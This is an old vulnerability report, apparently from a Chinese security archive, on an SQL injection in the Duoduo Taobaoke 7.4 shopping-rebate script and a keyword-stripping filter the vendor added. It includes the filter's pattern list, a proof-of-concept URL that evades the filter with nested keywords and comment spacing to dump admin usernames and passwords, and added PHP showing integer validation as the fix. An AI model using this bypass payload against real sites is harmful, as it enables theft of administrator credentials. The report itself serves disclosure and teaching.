Duoduo Taobaoke 7.4 SQL injection bypass vulnerability

2012-03-23T00:00:00
ID MYHACK58:62201233423
Type myhack58
Reporter Anonymous
Modified 2012-03-23T00:00:00

Description

Brief description:

Someone previously reported an injection in this Duoduo program:

http://www.wooyun.org/bugs/wooyun-2010-04024

Looking at the source code, it is almost a bare, unfiltered injection:

$id =$_GET['id'];

$good=sel_sql('dhlist','id,name,pic,money,jifen,num,content,num','id='.$id);

OK, OK! After seeing the Duoduo and Storm vulnerabilities discussed online, I downloaded the code from before the 20th and looked at it for a while. I found it interesting, and it reflects a very serious problem that everyone can learn from.

Detailed description:

In the 7.4 code released before March 20, the injection has not been fixed. It is still in huangou.php:

$id =$_GET['id'];

$good=sel_sql('dhlist','id,name,pic,money,jifen,num,content,num','id='.$id);

But why does it no longer work in the test environment? A closer look at the code shows that it now also contains:

include_once 'comm/checkpostandget.php';

What does this file contain?

$ArrFiltrate = array(
    "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i",
    "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\'#i", "#delete#i",
    "#vbscript#i", "#applet#i", "#of frame#i", "#<div#i", "#update#i", "#'#i",
    "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i",
    "#update#i"
);
// Every match is replaced with the empty string, i.e. simply deleted.
$replacements = "";

// Recursively apply the pattern list to every value of the array, in place.
function FunStringExist(&$array, $ArrFiltrate, $replacements) {
    if (is_array($array)) {
        foreach ($array as $key => $value) {
            if (is_array($value))
                FunStringExist($array[$key], $ArrFiltrate, $replacements);
            else
                $array[$key] = preg_replace($ArrFiltrate, $replacements, $value);
        }
    }
}

FunStringExist($_GET, $ArrFiltrate, $replacements);
FunStringExist($_POST, $ArrFiltrate, $replacements);

How wonderful. It turns out that instead of concentrating on fixing the vulnerability itself, they added a global filter function over the GET and POST arrays. But doesn't that bring a lot of problems of its own? Leaving aside whether the pattern and replacement lists are complete, the logic itself has a very big problem.

Proof of vulnerability:

For keywords such as union, writing uniounionn is enough; for spaces, use /**/.

http://www.xxx.com/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/0,1,2,adminname,adminpass,5,6,7/**/from/**/duoduo_duoduo2010

Repair solutions:

You should get it.
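Why the global filter fails, and what handling the id parameter safely looks like, as an added example that is not the vendor's code or part of the original report. strip_keywords() models the filter with a shortened pattern list, and filter_is_stable() and parse_id() are hypothetical helper names.

```php
<?php
// Added example, not the vendor's code.
// Shortened model of the filter in comm/checkpostandget.php (assumption:
// only five of the page's patterns are kept; replacement is the empty string).
function strip_keywords(string $value): string
{
    $patterns = ['#union#i', '#select#i', '#and #i', "#'#i", '#;#i'];
    // preg_replace() applies each pattern once, left to right, and never
    // rescans the text that remains after a match has been removed.
    return preg_replace($patterns, '', $value);
}

// A removal filter is only sound if its own output contains nothing it
// would remove: filtering a second time must change nothing.
function filter_is_stable(string $value): bool
{
    $once = strip_keywords($value);
    return strip_keywords($once) === $once;
}

// Hardened handling of the id parameter (hypothetical helper): accept a
// positive integer only and reject anything else instead of repairing it.
function parse_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed sample values for the id parameter.
$samples = ['42', '1 union select', '1/**/ununionion/**/seselectlect'];

foreach ($samples as $raw) {
    printf(
        "raw=%-34s filtered=%-24s stable=%-5s id=%s\n",
        $raw,
        strip_keywords($raw),
        var_export(filter_is_stable($raw), true),
        var_export(parse_id($raw), true)
    );
}
```

The third sample is reported as unstable because deleting the inner keyword reassembles the outer one, while parse_id() rejects it outright. The accepted integer should still be bound through a prepared statement rather than concatenated into the WHERE clause.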